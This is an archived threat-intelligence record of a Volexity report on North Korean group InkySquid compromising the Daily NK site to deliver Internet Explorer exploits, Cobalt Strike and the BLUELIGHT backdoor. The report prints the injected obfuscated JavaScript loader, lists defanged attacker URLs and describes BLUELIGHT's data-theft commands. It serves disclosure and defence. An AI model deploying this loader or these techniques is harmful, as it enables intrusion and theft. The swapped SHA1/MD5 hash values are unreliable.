{ "id": "3f234124-2fc7-4c29-b65e-6c457f7a18b1", "created_at": "2026-04-06T00:12:31.374338Z", "updated_at": "2026-04-10T03:38:06.300241Z", "deleted_at": null, "sha1_hash": "7a0ebf5e8bf22f17afe46eea852b54cd9ef989ee", "title": "North Korean APT InkySquid Infects Victims Using Browser Exploits", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 823582, "plain_text": "North Korean APT InkySquid Infects Victims Using Browser Exploits\r\nBy mindgrub\r\nPublished: 2021-08-17 · Archived: 2026-04-02 10:48:47 UTC\r\nVolexity recently investigated a strategic web compromise (SWC) of the website of the Daily NK (www.dailynk[.]com), a\r\nSouth Korean online newspaper that focuses on issues relating to North Korea. Malicious code on the Daily NK website was\r\nobserved from at least late March 2021 until early June 2021.\r\nThis post provides details on the different exploits used in the SWC, as well as the payload used, which Volexity calls\r\nBLUELIGHT. Volexity attributes the activity described in this post to a threat actor Volexity refers to as InkySquid, which\r\nbroadly corresponds to activity known publicly under the monikers ScarCruft and APT37.\r\nSWC Activity\r\nIn April 2021, through its network security monitoring on a customer network, Volexity identified suspicious code being\r\nloaded via www.dailynk[.]com to malicious subdomains of jquery[.]services. Examples of URLs observed loading\r\nmalicious code include the following:\r\nhxxps://www.dailynk[.]com/wp-includes/js/jquery/jquery.min.js?ver=3.5.1\r\nhxxps://www.dailynk[.]com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2\r\nThese URLs lead to legitimate files used as part of the normal function of the Daily NK website; however, their contents\r\nwere modified by the attacker to include code redirecting users to load malicious JavaScript from the attacker-owned\r\ndomain jquery[.]services. The attacker-included code was only added for short periods of time and was swiftly removed,\r\nmaking identification of this activity difficult as the malicious content was not always available.\r\nCVE-2020-1380\r\nThe first time Volexity was able to identify malicious code being returned, the attacker was observed using CVE-2020-1380,\r\nan exploit for Internet Explorer. The attacker added a single line of code to the following legitimate file on Daily NK:\r\nhxxps://www.dailynk[.]com/wp-includes/js/jquery/jquery.min.js?ver=3.5.1\r\nThe line of obfuscated code added to DailyNK was as follows:\r\nfunction vgrai(){var\r\ne=document.createElement(“script”);e.src=fecet(“w6625I\u003e\u003e7x=y37t4;=5t48xrt5\u003e4t52105x8t\u003ct:6t0s=/x0=y5”,15),document.head\u0026\u0026document.head.a\r\nvdgie(){const e=window.navigator.userAgent,t=e.indexOf(“rv:11.0 “),i=e.indexOf(“Trident/”);return\r\nt\u003e0||i\u003e0}vdgie()\u0026\u0026vgrai();\r\nThe effect of this is that if a user visited Daily NK using Internet Explorer, then a page would load an additional JavaScript\r\nfile from the following URL:\r\nhxxps://ui.jquery[.]services/responsive-extend.min.js\r\nhttps://www.volexity.com/blog/2021/08/17/north-korean-apt-inkysquid-infects-victims-using-browser-exploits/\r\nPage 1 of 5\n\nWhen requested, with the correct Internet Explorer User-Agent, this host would serve additional obfuscated JavaScript code.\r\nAs with the initial redirect, the attacker chose to bury their malicious code amongst legitimate code. In this particular case,\r\nthe attacker used the “bPopUp” JavaScript library alongside their own code. This decision has two effects:\r\n1. Anyone manually analyzing the JavaScript may dismiss it as legitimate, since the majority of the included code is\r\nbenign.\r\n2. Automated solutions used to identify malicious JavaScript may misidentify the code as benign, since large sections\r\nmatch known legitimate library content and use code patterns seen in benign JavaScript.\r\nOne interesting aspect of the exploit code the attacker includes is that many of the strings are obfuscated within variables\r\ndesigned to look like legitimate SVG content. An example of the attacker hiding these strings is given in Figure 1:\r\nFigure 1. Obfuscated strings within the falsified SVG variable\r\nIn order to decrypt the strings, the following steps are performed:\r\n1. Split the data contained within the “d” attribute of the “path” variable via the “M43.2” string.\r\n2. Take each element in the split data and split once again on space characters, resulting in a list of numbers.\r\n3. Convert each resulting number to an integer.\r\n4. If this integer is greater than 30, subtract 17 and append it to the resulting string. If the integer is 30 or less, discard it.\r\nA Python script to decode these SVG variables is provided on Volexity’s GitHub page here.\r\nIn total, three fake SVG objects were used. Once the strings from these objects are substituted into the remaining JavaScript,\r\nidentifying the exploit became easier. A key segment of the resulting code is given in Figure 2:\r\nhttps://www.volexity.com/blog/2021/08/17/north-korean-apt-inkysquid-infects-victims-using-browser-exploits/\r\nPage 2 of 5\n\nFigure 2. Implementation of CVE-2020-1380\r\nThis code corresponds to publicly available proof-of-concept (PoC) code for CVE-2020-1380 that has been well\r\ndocumented by TrendMicro.\r\nFollowing successful exploitation, the JavaScript decrypts a final SVG variable using the same technique described\r\npreviously. The resulting blob contains a hex-encoded representation of a Cobalt Strike stager, which is decoded and\r\nexecuted. In this case, the URLs from where it expected to download additional shellcode were as follows:\r\nhxxps://ui.jquery[.]services/swipeout.min.js\r\nhxxps://ui.jquery[.]services/swipeout.min.css\r\nhxxps://ui.jquery[.]services/slider.min.css\r\nCVE-2021-26411\r\nOn another occasion, CVE-2021-26411 was used, which is another exploit targeting Internet Explorer and legacy versions of\r\nMicrosoft Edge. The redirect code was set up in the same way as CVE-2020-1380, the only difference being the exploit\r\ncode used. The key part of the exploit code used is given in Figures 3 and 4. It was likely a direct implementation of the PoC\r\ncode posted here by Korean security company Enki.\r\nhttps://www.volexity.com/blog/2021/08/17/north-korean-apt-inkysquid-infects-victims-using-browser-exploits/\r\nPage 3 of 5\n\nFigure 3. Key exploit code used by the attackers\r\nFigure 4. PoC code released on the Enki security blog\r\nAs with the CVE-2020-1380 example, the attacker made use of encoded content stored in SVG tags to store both key strings\r\nand their initial payload. The initial command-and-control (C2) urls were the same as those observed in the CVE-2020-1380\r\ncase.\r\nBLUELIGHT\r\nOn another occasion, the attacker used a different subdomain of jquery[.]services to host a new and novel malware family.\r\nThe file was hosted at the following location:\r\nhxxps://storage.jquery[.]services/log/history\r\nThe “history” file was an XOR-encoded (0xCF) copy of a custom malware family that both the malware developer and\r\nVolexity refer to as BLUELIGHT. The moniker is derived from the PDB string observed in the malware:\r\nE:\\Development\\BACKDOOR\\ncov\\Release\\bluelight.pdb\r\nIt is likely that BLUELIGHT is used as a secondary payload following successful delivery of Cobalt Strike, which was used\r\nas an initial payload in both exploitation cases highlighted earlier in this report.\r\nThe file analyzed for this report had the following details:\r\nFilename history\r\nSHA1 9b86888a83dd0dd1c3a0929f1ea53b82\r\nMD5 558ce5e8c0b1b0a76b88db087f0c92f7a62716fe\r\nSHA256 5c430e2770b59cceba1f1587b34e686d586d2c8ba1908bb5d066a616466d2cc6\r\nNotes Shellcode with embedded PE.\r\nThe BLUELIGHT malware family uses different cloud providers to facilitate C2. This specific sample leveraged the\r\nMicrosoft Graph API for its C2 operations. Upon start-up, BLUELIGHT performs an oauth2 token authentication using\r\nhard-coded parameters. Once the client is authenticated, BLUELIGHT creates a new subdirectory in the OneDrive appfolder\r\nand populates it with several subdirectories used by the C2 protocol. The following subdirectory names were used:\r\nlogo\r\nnormal\r\nbackground\r\nhttps://www.volexity.com/blog/2021/08/17/north-korean-apt-inkysquid-infects-victims-using-browser-exploits/\r\nPage 4 of 5\n\ntheme\r\nround\r\nOnce the folder and subdirectories are set up, reconnaissance data is gathered containing the following information,\r\nformatted as a JSON object:\r\nUsername\r\nComputer name\r\nOS version\r\nWeb IP\r\nLocal IP of default interface\r\nLocalTime\r\nWhether the implant binary is 32 or 64 bit\r\nProcess SID authority level\r\nProcess filename\r\nList of AV products installed\r\nWhether the infected machine has VM tools running\r\nThe data is XOR encoded into a binary blob and uploaded.  All further reconnaissance and command response data is\r\nsimilarly encoded. This version of the implant used the “.jpg” extension for nearly all files uploaded regardless of their\r\ncontent, with different subdirectories and base filenames indicating different types of command data. The reconnaissance\r\ndata, for instance, is uploaded to the “logo/title.jpg” path.\r\nThe main C2 loop starts after the initial upload of the reconnaissance data, iterating once every approximately 30 seconds.\r\nFor the first five minutes, each iteration will capture a screenshot of the display and upload it to the “normal” subdirectory\r\nwith an encoded timestamp as the filename. After the first five minutes, the screenshot uploads once every five minutes.\r\nWith every iteration, the client will also query for new commands by enumerating the children of the “background”\r\nsubdirectory. The name of the file indicates the command to perform, with the contents of the file providing further\r\ncommand-specific information. The following commands are supported:\r\nExecute downloaded shellcode.\r\nDownload and launch an executable, then upload program output.\r\nHarvest cookies and a password database for supported browsers.\r\n— Supports: Win7 IE, Win10 IE, Edge, Chrome, and Naver Whale\r\nRecursively search a path and upload file metadata (timestamps, size, and full path).\r\nSpawn a thread to recursively search a path and upload files as a ZIP archive.\r\nTerminate the file upload thread.\r\nUninstall the implant.\r\nCommand files are deleted after being processed. Result files for most commands are uploaded to the “round” directory;\r\nhowever, the ZIP upload uses the “theme” subdirectory.\r\nConclusion\r\nWhile SWCs are not as popular as they once were, they continue to be a weapon in the arsenal of many attackers. The use of\r\nrecently patched exploits for Internet Explorer and Microsoft Edge will only work against a limited audience. Attackers will\r\nstill have some success, however, and have a good chance of avoiding detection based on the following attributes of their\r\nattack:\r\nClever disguise of exploit code amongst legitimate code, making it harder to identify\r\nOnly allowing exploitable user-agents access to the exploit code, making it difficult to identify at scale (such as\r\nthrough automated scanning of websites)\r\nUse of innovative custom malware, such as BLUELIGHT, after successful exploitation using C2 mechanisms which\r\nare unlikely to be detected by many solutions\r\nHow is this activity attributed to InkySquid (aka ScarCruft, APT37)? This will be explained further in a follow-up post, so\r\nstay tuned!\r\nIoCs \u0026 Signatures\r\nRelated IoCs and signatures to this post are available on Volexity’s GitHub page here.\r\nSource: https://www.volexity.com/blog/2021/08/17/north-korean-apt-inkysquid-infects-victims-using-browser-exploits/\r\nhttps://www.volexity.com/blog/2021/08/17/north-korean-apt-inkysquid-infects-victims-using-browser-exploits/\r\nPage 5 of 5", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA", "MISPGALAXY", "Malpedia", "MITRE" ], "references": [ "https://www.volexity.com/blog/2021/08/17/north-korean-apt-inkysquid-infects-victims-using-browser-exploits/" ], "report_names": [ "north-korean-apt-inkysquid-infects-victims-using-browser-exploits" ], "threat_actors": [ { "id": "6f30fd35-b1c9-43c4-9137-2f61cd5f031e", "created_at": "2025-08-07T02:03:25.082908Z", "updated_at": "2026-04-10T02:00:03.744649Z", "deleted_at": null, "main_name": "NICKEL FOXCROFT", "aliases": [ "APT37 ", "ATK4 ", "Group 123 ", "InkySquid ", "Moldy Pisces ", "Operation Daybreak ", "Operaton Erebus ", "RICOCHET CHOLLIMA ", "Reaper ", "ScarCruft ", "TA-RedAnt ", "Venus 121 " ], "source_name": "Secureworks:NICKEL FOXCROFT", "tools": [ "Bluelight", "Chinotto", "GOLDBACKDOOR", "KevDroid", "KoSpy", "PoorWeb", "ROKRAT", "final1stpy" ], "source_id": "Secureworks", "reports": null }, { "id": "d90307b6-14a9-4d0b-9156-89e453d6eb13", "created_at": "2022-10-25T16:07:23.773944Z", "updated_at": "2026-04-10T02:00:04.746188Z", "deleted_at": null, "main_name": "Lead", "aliases": [ "Casper", "TG-3279" ], "source_name": "ETDA:Lead", "tools": [ "Agentemis", "BleDoor", "Cobalt Strike", "CobaltStrike", "RbDoor", "RibDoor", "Winnti", "cobeacon" ], "source_id": "ETDA", "reports": null }, { "id": "bbe36874-34b7-4bfb-b38b-84a00b07042e", "created_at": "2022-10-25T15:50:23.375277Z", "updated_at": "2026-04-10T02:00:05.327922Z", "deleted_at": null, "main_name": "APT37", "aliases": [ "APT37", "InkySquid", "ScarCruft", "Group123", "TEMP.Reaper", "Ricochet Chollima" ], "source_name": "MITRE:APT37", "tools": [ "BLUELIGHT", "CORALDECK", "KARAE", "SLOWDRIFT", "ROKRAT", "SHUTTERSPEED", "POORAIM", "HAPPYWORK", "Final1stspy", "Cobalt Strike", "NavRAT", "DOGCALL", "WINERACK" ], "source_id": "MITRE", "reports": null }, { "id": "552ff939-52c3-421b-b6c9-749cbc21a794", "created_at": "2023-01-06T13:46:38.742547Z", "updated_at": "2026-04-10T02:00:03.08515Z", "deleted_at": null, "main_name": "APT37", "aliases": [ "Operation Daybreak", "Red Eyes", "ScarCruft", "G0067", "Group123", "Reaper Group", "Ricochet Chollima", "ATK4", "APT 37", "Operation Erebus", "Moldy Pisces", "APT-C-28", "Group 123", "InkySquid", "Venus 121" ], "source_name": "MISPGALAXY:APT37", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "f4f16213-7a22-4527-aecb-b964c64c2c46", "created_at": "2024-06-19T02:03:08.090932Z", "updated_at": "2026-04-10T02:00:03.6289Z", "deleted_at": null, "main_name": "GOLD NIAGARA", "aliases": [ "Calcium ", "Carbanak", "Carbon Spider ", "FIN7 ", "Navigator ", "Sangria Tempest ", "TelePort Crew " ], "source_name": "Secureworks:GOLD NIAGARA", "tools": [ "Bateleur", "Carbanak", "Cobalt Strike", "DICELOADER", "DRIFTPIN", "GGLDR", "GRIFFON", "JSSLoader", "Meterpreter", "OFFTRACK", "PILLOWMINT", "POWERTRASH", "SUPERSOFT", "TAKEOUT", "TinyMet" ], "source_id": "Secureworks", "reports": null }, { "id": "9b02c527-5077-489e-9a80-5d88947fddab", "created_at": "2022-10-25T16:07:24.103499Z", "updated_at": "2026-04-10T02:00:04.867181Z", "deleted_at": null, "main_name": "Reaper", "aliases": [ "APT 37", "ATK 4", "Cerium", "Crooked Pisces", "G0067", "Geumseong121", "Group 123", "ITG10", "InkySquid", "Moldy Pisces", "Opal Sleet", "Operation Are You Happy?", "Operation Battle Cruiser", "Operation Black Banner", "Operation Daybreak", "Operation Dragon messenger", "Operation Erebus", "Operation Evil New Year", "Operation Evil New Year 2018", "Operation Fractured Block", "Operation Fractured Statue", "Operation FreeMilk", "Operation Golden Bird", "Operation Golden Time", "Operation High Expert", "Operation Holiday Wiper", "Operation Korean Sword", "Operation North Korean Human Right", "Operation Onezero", "Operation Rocket Man", "Operation SHROUDED#SLEEP", "Operation STARK#MULE", "Operation STIFF#BIZON", "Operation Spy Cloud", "Operation Star Cruiser", "Operation ToyBox Story", "Osmium", "Red Eyes", "Ricochet Chollima", "Ruby Sleet", "ScarCruft", "TA-RedAnt", "TEMP.Reaper", "Venus 121" ], "source_name": "ETDA:Reaper", "tools": [ "Agentemis", "BLUELIGHT", "Backdoor.APT.POORAIM", "CARROTBALL", "CARROTBAT", "CORALDECK", "Cobalt Strike", "CobaltStrike", "DOGCALL", "Erebus", "Exploit.APT.RICECURRY", "Final1stSpy", "Freenki Loader", "GELCAPSULE", "GOLDBACKDOOR", "GreezeBackdoor", "HAPPYWORK", "JinhoSpy", "KARAE", "KevDroid", "Konni", "MILKDROP", "N1stAgent", "NavRAT", "Nokki", "Oceansalt", "POORAIM", "PoohMilk", "PoohMilk Loader", "RICECURRY", "RUHAPPY", "RokRAT", "SHUTTERSPEED", "SLOWDRIFT", "SOUNDWAVE", "SYSCON", "Sanny", "ScarCruft", "StarCruft", "Syscon", "VeilShell", "WINERACK", "ZUMKONG", "cobeacon" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434351, "ts_updated_at": 1775792286, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/7a0ebf5e8bf22f17afe46eea852b54cd9ef989ee.pdf", "text": "https://archive.orkl.eu/7a0ebf5e8bf22f17afe46eea852b54cd9ef989ee.txt", "img": "https://archive.orkl.eu/7a0ebf5e8bf22f17afe46eea852b54cd9ef989ee.jpg" } }